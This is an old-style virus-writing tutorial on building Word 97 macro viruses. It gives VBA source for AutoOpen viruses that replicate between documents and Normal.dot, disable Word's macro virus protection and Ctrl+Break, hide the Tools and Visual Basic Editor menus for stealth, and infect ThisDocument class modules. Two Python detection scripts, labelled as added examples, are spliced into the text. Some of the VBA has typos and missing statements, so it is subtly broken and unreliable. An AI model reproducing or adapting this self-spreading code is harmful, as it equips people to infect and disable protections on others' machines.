Word 97 macro virus

How the hell can I make a Word 97 virus?

You don't need to know VB syntax to understand this mag!
But it would be good to look into the help files from time to time!


How a macro virus works:

What's a macro virus
How you can find a virus
The Word97 virus

Ok, I know how to make a simple virus, but what about the advanced virii?
Now take a look into the VBA help, and look for "For/Next loops" and "If-Then"

Let's do it better
What's stealth? and how to hide

The Word97 class virii:

What's a class virus? and how to write

for problems: Lord_Arz@gmx.net
meet able in the undernet #vir

The Macro Virus

A macro virus is a WordBasic script (Word97 virii are written in Visual Basic) which copies itself to the Normal.dot.
The Normal.dot will be started if you open a document. If the virus is in the Normal.dot, it copies itself to the document.
Let's have a look at the ASCII picture below:

INFECTED DOCUMENT-------(virus)---------->NORMAL.DOT                        the Normal.dot is now infected.

INFECTED NORMAL.DOT-----(virus)---------->DOCUMENT                          the Document is infected

The Basic language is easy to learn compared with assembly language. But with assembler you can do much more than with Basic! Of course there are polymorphic and stealth macro virii, but they are easy to detect, because the code is very visible in the Normal.dot. In Word 97 it was very easy to encrypt macro virii, but in Word97 it is more or less impossible or senseless, because you have to leave a part of the macro unencrypted.

How to find a macro virus

I thought it's good to know how to find a macro virus, 'coz then you know where you have to be careful if you write one.

Most virii use stealth techniques against the user; that means you can't see the code. They remove ToolsMacro from the command bar, or have a better stealth function. Well, because this is a Word97 virii writing tutorial, I'll list how to detect Word97 virii.

The virus removes or locks Tools Macro and/or the Visual Basic Editor:

Open the Normal.dot with a hex editor and rename everything that looks like this:

M O D U L E 1 . T O O L S M A C R O  

M O D U L E 1 . V I E W V B C O D E

Another good trick is to export all macros from the Normal.dot to a file. If you want to know more about it, read on!
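The hex-editor check above can be automated. This is an added example, not part of the original tutorial: it searches raw template bytes for the two command names stored as UTF-16LE, which is why a hex editor shows them with gaps between the letters. The function names and the sample bytes are constructed for illustration.

```python
import re

# Macro names the page says to look for in Normal.dot. A hex editor shows them
# with a gap between letters because they are stored as UTF-16LE (letter, NUL).
HOOK_NAMES = ("TOOLSMACRO", "VIEWVBCODE")

def utf16_pattern(name):
    """Case-insensitive regex for `name` encoded as UTF-16LE."""
    parts = []
    for ch in name:
        pair = (ch.lower() + ch.upper()).encode("ascii")
        parts.append(b"[" + pair + b"]\x00")
    return re.compile(b"".join(parts))

def is_ident_byte(b):
    """True for ASCII letters, digits, '.' and '_' (module-qualified names)."""
    return b < 128 and (chr(b).isalnum() or chr(b) in "._")

def find_hook_names(data):
    """Return sorted (offset, name) hits, including any 'MODULE1.' style prefix."""
    hits = []
    for name in HOOK_NAMES:
        for m in utf16_pattern(name).finditer(data):
            start = m.start()
            # Walk back over preceding UTF-16LE identifier characters.
            while start >= 2 and data[start - 1] == 0 and is_ident_byte(data[start - 2]):
                start -= 2
            hits.append((start, data[start:m.end()].decode("utf-16-le")))
    return sorted(hits)

# Constructed sample bytes standing in for a template image (not a real file).
SAMPLE = (b"\x00\x01junk"
          + "MODULE1.TOOLSMACRO".encode("utf-16-le") + b"\x00\x00\xff\xff"
          + "Module1.ViewVBCode".encode("utf-16-le") + b"\x00\x00")

if __name__ == "__main__":
    for offset, name in find_hook_names(SAMPLE):
        print(f"0x{offset:04x}  {name}")
```

Run it on a copy of the template with `find_hook_names(open(path, "rb").read())`. A hit only shows that the file defines a macro with that command name, so review the macro itself before treating the template as infected.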

The Word97 Macro Virus

How Word97 Works

Word97 is based primarily on macros. You can change nearly everything if you know what a macro is used for. For example, say you want to show a message on every start of Word:

Click on Tools - Macros - Visual Basic Editor.

In the project browser, click with the right mouse button on Projects(Normal) and select add module.

Double-click the module. You'll see a text area at the left part of the screen.

Type the following:

Sub AutoOpen()
MsgBox "Hello"
End Sub

I won't describe this simple code... you can read it in the help! But you see AutoOpen will be executed on every start of the Normal.dot. Of course there are many ways to call a macro on every start. A virus inserts an infection code instead of the message box.

Here is only a short description:

Module name: FirstMacVir
Sub AutoOpen()
VSource=ActiveDocument.FullName
VDestination=NormalTemplate.FulllName
If UCase(ThisDocument.Name)="NORMAL.DOT" then
VSource= VDestination
VDestination=ActiveDocument.FullName
Application.OrganizerCopy VSource, VDestination "FirstMacVir", wdOrganizerObjectProjectItems
End Sub

VSource is the file where the virus is.

VDestination is the file which the virus has to infect.

I use UCase to catch errors which might happen if the letter cases are different, e.g. the normal template's name is "Normal.Dot" instead of "Normal.dot".

Now copy the macro FirstMacVir from VSource to VDestination.

That's a short and very simple virus.

The Advanced Virus

Note! If you want to be good, you have to try things out and explore!

In the last level we wrote a very simple virus; it would work, but not very well. The virus would spread and spread and the files would grow on and on... to avoid this you have to check. Check routines depend on the virus!! If you write a module virus with a fixed name, you can identify the virus by the module name. So did the first virii which were around, and so we will do it too in this level:

Module name: Virus2

Sub AutoOpen()
If UCase(ThisDocument.Name) = "NORMAL.DOT" Then
    For i=1 to ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name="Virus2" Then Goto EndOfVirus

    Next i
   VSource=NormalTemplate.FullName
    VDestiny=ActiveDocument.FullName
Else
    For i=1 to NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(i).Name="Virus2" Then Goto EndOfVirus
    Next i

    VSource=ActiveDocument.FullName
    VDestiny=NormalTemplate.FullName
End if

Application.OrganizerCopy VSource, VDestiny, "ExampleVirus", wdOrganizerObjectProjectItems
EndOfVirus:
End Sub


Ok, you see, this virus uses an infection routine and a check routine. Well, now we've a good and short virus, but without any protection. Protection also depends on the virus!!

Module name: Virus2

Sub AutoOpen()
Application.EnableCancelKey=False
Options.VirusProdection=False

If UCase(ThisDocument.Name) = "NORMAL.DOT" Then
    For i=1 to ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name="Virus2" Then Goto EndOfVirus

    Next i
   VSource=NormalTemplate.FullName
    VDestiny=ActiveDocument.FullName
Else
    For i=1 to NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(i).Name="Virus2" Then Goto EndOfVirus
    Next i

    VSource=ActiveDocument.FullName
    VDestiny=NormalTemplate.FullName
End if

Application.OrganizerCopy VSource, VDestiny, "ExampleVirus", wdOrganizerObjectProjectItems
EndOfVirus:
End Sub

The first line below Sub AutoOpen() disables the Break (Ctrl+Break); that means the user isn't able to interrupt the virus by Ctrl-Break.
The second line disables the virus protection of Word97. (I hope you all know what I mean)

Now you have a protected virus that checks for infections.


Stealth

You should add stealth techniques to every one of your virii!!

There are the simple stealth techniques and the special stealth techniques, which require special knowledge! Stealth ain't stealth in every case! Take a look at the SuperIIS and then take a look at another virus; SuperIIS has a very advanced stealth technique, but the code is (with the infection engine, which is also special) more than a few hundred lines long!!!!
But let's start with the basic stealth:

Create a new module and add the following lines:

Sub ViewVBCode()
End Sub

Now try, in the document, to click on Tools-Macros-Visual Basic Editor.
Huh? It hasn't worked?? This is because of the macro. Go to the macro by Tools-Macros-Create. In the dialog box click on your new macro and click on the Edit button.

The macro you need to lock this could be:

Sub ToolsMacros()
End Sub

Of course there are many such simple tricks, but these were the most used. Take a look at other module virii and study them.

To kill the whole Tools menu, type the following line in your virus:

Application.CommandBars("Tools").Enabled=False

To kill the Tools Macros only:

Application.CommandBars("Tools").Controls(12).Enabled=False 'you can use Visible=False too, to hide this option!!

The Class Virus

The class virus infects class modules of a Word document. Classes are invisible in the 'Tools-macros' dialog. I prefer to write class virii which infect the class 'ThisDocument'. This is because this class is in EVERY document. I'll explain here how to write such virii. Notice that these virii have a different infection method!

To get my own position I use:
MyPos=ThisDocument.Name


Which ThisDocument class I want to infect depends on MyPos.
Let's say MyPos="Normal.dot", so I take:
set target=ActiveDocument.VBProject.VBComponents(1).CodeModule

The code for the infection:

With NormalTemplate.VBProject.VBComponents(1).CodeModule
    VirusCode= .Lines(1, .CountOfLines)
End With
With target
    .DeleteLines 1, .CountOfLines
    .InsertLines 1, VirusCode
End With
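
Seen from the detection side, the behaviours walked through on this page (an auto-run macro, copying via the Organizer or rewriting a code module, switching off Word's macro warning and Ctrl+Break, hiding or stubbing the Tools menu entries) are what a reviewer looks for in macro source exported from Normal.dot or a document. The triage script below is an added example, not part of the original tutorial: the indicator names, verdict labels and sample module are constructed, and matching auto-macro names other than AutoOpen goes beyond what the page covers.

```python
import re

# Indicator name -> pattern, one per behaviour this page describes (VBA is
# case-insensitive). Auto-macro names beyond AutoOpen are an added generalisation.
INDICATORS = {
    "auto_exec": r"^\s*(?:Private\s+|Public\s+)?Sub\s+(?:Auto(?:Open|Close|Exec|New)|Document_Open)\b",
    "template_copy": r"\bOrganizerCopy\b",
    "code_rewrite": r"\.(?:InsertLines|DeleteLines)\b",
    "protection_off": r"\bVirusProtection\s*=\s*(?:False|0)\b",
    "break_disabled": r"\bEnableCancelKey\s*=\s*(?:False|0)\b",
    "menu_disabled": r'CommandBars\(\s*"Tools"\s*\).*\.(?:Enabled|Visible)\s*=\s*False',
    "ui_hook": r"^\s*Sub\s+(?:ToolsMacros?|ViewVBCode)\s*\(",
}
COMPILED = {k: re.compile(v, re.IGNORECASE) for k, v in INDICATORS.items()}
TAMPERING = {"protection_off", "break_disabled", "menu_disabled", "ui_hook"}

def strip_comment(line):
    """Drop a trailing VBA comment, ignoring apostrophes inside string literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line

def triage(source):
    """Return ({indicator: [line numbers]}, verdict) for one exported module."""
    hits = {}
    for no, raw in enumerate(source.splitlines(), 1):
        code = strip_comment(raw)
        for name, rx in COMPILED.items():
            if rx.search(code):
                hits.setdefault(name, []).append(no)
    replicates = "auto_exec" in hits and bool({"template_copy", "code_rewrite"} & hits.keys())
    verdict = "self-replicating" if replicates else "suspicious" if TAMPERING & hits.keys() else "clean"
    return hits, verdict

# Constructed sample: indicator lines only, with undefined placeholders src/dst.
SAMPLE = '''Sub AutoOpen()
Application.EnableCancelKey = False
Options.VirusProtection = False   ' constructed sample line
Application.OrganizerCopy src, dst, "Mod", wdOrganizerObjectProjectItems
End Sub
Sub ViewVBCode()
End Sub
'''
```

`triage(SAMPLE)` returns the matching line numbers per indicator and the verdict `"self-replicating"`. A module that only touches the menu or protection settings is reported as `"suspicious"` for manual review.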